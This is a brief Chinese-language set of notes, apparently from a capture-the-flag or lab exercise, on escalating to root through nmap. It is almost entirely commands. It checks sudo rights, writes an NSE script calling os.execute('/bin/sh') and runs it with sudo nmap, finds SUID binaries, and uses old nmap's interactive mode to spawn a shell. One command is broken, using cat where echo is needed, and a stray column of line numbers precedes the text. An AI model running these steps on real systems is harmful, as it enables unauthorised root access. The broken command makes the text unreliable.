nmap提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
sudo -l
存在root无密码运行nmap
echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

第一个:
#就是低版本可以用那个交互式
find / -perm -u=s -type f 2>/dev/null
#查询可以用得suid
#nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令
/usr/local/bin/nmap --interactive
nmap --interactive  #即可得到交互式shell
nmap>
#之后输入
!sh

#要求:
nmap有s标志位

+----
nmap版本足够老
------------------------------------------------
第二个:
nmap以root运行
cat os.execute("/bin/sh") > nse_root.nse
#nse是nmap的插件扩展名
nmap --script=/home/jens/nse_root.nse

Dnmap提权flag